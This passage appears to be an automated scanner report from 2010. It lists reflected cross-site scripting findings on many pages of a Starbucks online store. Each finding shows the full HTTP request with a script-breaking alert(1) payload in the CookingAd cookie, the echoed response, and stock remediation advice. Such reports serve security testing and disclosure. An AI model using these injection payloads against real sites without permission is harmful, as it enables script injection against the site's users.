GET /coffee-machines HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB76c32</script><script>alert(1)</script>953da364365;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 21134 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:37:59 GMT Connection: close
<!--S1--><!--S0-->
<html> <head> <link REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name= ...[SNIP]... eName="Equipment Homepage" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="Equipment Homepage" var s_prop3="SBPTPAHP1SHTB76C32</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>953DA364365" var s_prop4="" var s_prop5="" var s_prop6="/coffee-machines/default.asp" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_campaign=""
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload da449</script><script>alert(1)</script>9e10653ba75 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /coffee-machines/ HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTBda449</script><script>alert(1)</script>9e10653ba75;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 21134 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:36:23 GMT Connection: close
<!--S1--><!--S0-->
<html> <head> <link REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name= ...[SNIP]... eName="Equipment Homepage" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="Equipment Homepage" var s_prop3="SBPTPAHP1SHTBDA449</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>9E10653BA75" var s_prop4="" var s_prop5="" var s_prop6="/coffee-machines/default.asp" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_campaign=""
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8163c</script><script>alert(1)</script>ec3893ac889 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /default.asp HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB8163c</script><script>alert(1)</script>ec3893ac889;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 21224 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:45:50 GMT Connection: close
<!--S1--><!--S0--> <link href="/include/sitenew.css" type="text/css" rel="StyleSheet"> <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name="description" content="F ...[SNIP]... ines. */ var s_pageName="HomePage" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="HomePage" var s_prop3="SBPTPAHP1SHTB8163C</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>EC3893AC889" var s_prop4="" var s_prop5="" var s_prop6="/default.asp" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_campaign="" var s_state=""
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cdb1e</script><script>alert(1)</script>221b4ee20e3 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /entertainment HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTBcdb1e</script><script>alert(1)</script>221b4ee20e3;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 16383 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:38:01 GMT Connection: close
<!--S1--><!--S0--> <link href="/include/sitenew.css" type="text/css" rel="StyleSheet"> <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name="description" conte ...[SNIP]... rbucks Entertainment" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="Starbucks Entertainment" var s_prop3="SBPTPAHP1SHTBCDB1E</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>221B4EE20E3" var s_prop4="" var s_prop5="" var s_prop6="/entertainment/default.asp" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_campaign="" va ...[SNIP]...
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 687ff</script><script>alert(1)</script>a3b2dc7f084 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /entertainment/ HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB687ff</script><script>alert(1)</script>a3b2dc7f084;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 16383
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:44:12 GMT
Connection: close
<!--S1--><!--S0--> <link href="/include/sitenew.css" type="text/css" rel="StyleSheet"> <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name="description" conte ...[SNIP]... rbucks Entertainment" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="Starbucks Entertainment" var s_prop3="SBPTPAHP1SHTB687FF</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>A3B2DC7F084" var s_prop4="" var s_prop5="" var s_prop6="/entertainment/default.asp" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_campaign="" va ...[SNIP]...
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2b33f</script><script>alert(1)</script>b422eca8919 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /extras/newsletters.asp HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB2b33f</script><script>alert(1)</script>b422eca8919;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 16365
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:45:14 GMT
Connection: close
<!--S1--><!--S0-->
<html> <head> <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name= ...[SNIP]... ame="/extras/newsletters.asp" var s_setRef="" var s_server="10.11.5.109" var s_channel="" var s_pageType="" var s_prop1="" var s_prop2="/extras/newsletters.asp" var s_prop3="SBPTPAHP1SHTB2B33F</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>B422ECA8919" var s_prop4="" var s_prop5="" var s_prop6="/extras/newsletters.asp" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_campaign="" var s ...[SNIP]...
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 30c1e</script><script>alert(1)</script>c2c9791a405 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /guestassist/ga_faq_shipop.asp HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB30c1e</script><script>alert(1)</script>c2c9791a405;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 42766
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:37:31 GMT
Connection: close
<!--S1--><!--S0-->
<html> <head> <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name= ...[SNIP]... ist/ga_faq_shipop.asp" var s_setRef="" var s_server="10.11.5.109" var s_channel="" var s_pageType="" var s_prop1="" var s_prop2="/guestassist/ga_faq_shipop.asp" var s_prop3="SBPTPAHP1SHTB30C1E</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>C2C9791A405" var s_prop4="" var s_prop5="" var s_prop6="/guestassist/ga_faq_shipop.asp" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_campaign="" ...[SNIP]...
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1de33</script><script>alert(1)</script>0be688d889d was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /guestassist/gareturns.asp HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB1de33</script><script>alert(1)</script>0be688d889d;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 15086
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:37:32 GMT
Connection: close
<!--S1--><!--S0-->
<html> <head> <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name= ...[SNIP]... guestassist/gareturns.asp" var s_setRef="" var s_server="10.11.5.109" var s_channel="" var s_pageType="" var s_prop1="" var s_prop2="/guestassist/gareturns.asp" var s_prop3="SBPTPAHP1SHTB1DE33</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>0BE688D889D" var s_prop4="" var s_prop5="" var s_prop6="/guestassist/gareturns.asp" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_campaign="" va ...[SNIP]...
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a945e</script><script>alert(1)</script>f60d28581e3 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /guestassist/shcontus.asp HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTBa945e</script><script>alert(1)</script>f60d28581e3;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 20651
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:37:23 GMT
Connection: close
<!--S1--><!--S0-->
<html> <head> <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name= ...[SNIP]... "/guestassist/shcontus.asp" var s_setRef="" var s_server="10.11.5.109" var s_channel="" var s_pageType="" var s_prop1="" var s_prop2="/guestassist/shcontus.asp" var s_prop3="SBPTPAHP1SHTBA945E</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>F60D28581E3" var s_prop4="" var s_prop5="" var s_prop6="/guestassist/shcontus.asp" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_campaign="" var ...[SNIP]...
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ddee2</script><script>alert(1)</script>8b507b6fff0 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mya/links.asp HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTBddee2</script><script>alert(1)</script>8b507b6fff0;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 15659
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:37:05 GMT
Connection: close
<html> <head> <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <META HTTP-EQUIV="Cont ...[SNIP]... . */ var s_pageName="/mya/links.asp" var s_setRef="" var s_server="10.11.5.109" var s_channel="" var s_pageType="" var s_prop1="" var s_prop2="/mya/links.asp" var s_prop3="SBPTPAHP1SHTBDDEE2</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>8B507B6FFF0" var s_prop4="" var s_prop5="" var s_prop6="/mya/links.asp" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_campaign="" var s_state="" ...[SNIP]...
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 860c7</script><script>alert(1)</script>9b9756a0816 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mya/track.asp HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB860c7</script><script>alert(1)</script>9b9756a0816;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 18382
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:37:07 GMT
Connection: close
<html> <head> <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <META HTTP-EQUIV="Cont ...[SNIP]... . */ var s_pageName="/mya/track.asp" var s_setRef="" var s_server="10.11.5.109" var s_channel="" var s_pageType="" var s_prop1="" var s_prop2="/mya/track.asp" var s_prop3="SBPTPAHP1SHTB860C7</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>9B9756A0816" var s_prop4="" var s_prop5="" var s_prop6="/mya/track.asp" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_campaign="" var s_state="" ...[SNIP]...
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d6b5c</script><script>alert(1)</script>9153adaaf8c was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /products/include/SearchNav.asp HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTBd6b5c</script><script>alert(1)</script>9153adaaf8c;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 14427
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:44:17 GMT
Connection: close
<!--S1--><!--S0-->
<html> <head> <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name= ...[SNIP]... Name="Search Listing:" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="/products/shprodli.asp" var s_prop3="SBPTPAHP1SHTBD6B5C</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>9153ADAAF8C" var s_prop4="" var s_prop5="" var s_prop6="/products/shprodli.asp" var s_prop7="" var s_prop8="" var s_prop9="Search Listing: Internal: " var s_prop10="" /* E-commerce Variables */
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3a282</script><script>alert(1)</script>e390fba785c was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /products/shabotus.asp HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB3a282</script><script>alert(1)</script>e390fba785c;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 14484
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:41:38 GMT
Connection: close
<!--S1--><!--S0-->
<html> <head> <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name= ...[SNIP]... products/shabotus.asp" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="/products/shabotus.asp" var s_prop3="SBPTPAHP1SHTB3A282</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>E390FBA785C" var s_prop4="" var s_prop5="" var s_prop6="/products/shabotus.asp" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_campaign="" var s_ ...[SNIP]...
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d15c0</script><script>alert(1)</script>f0bd362f13 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
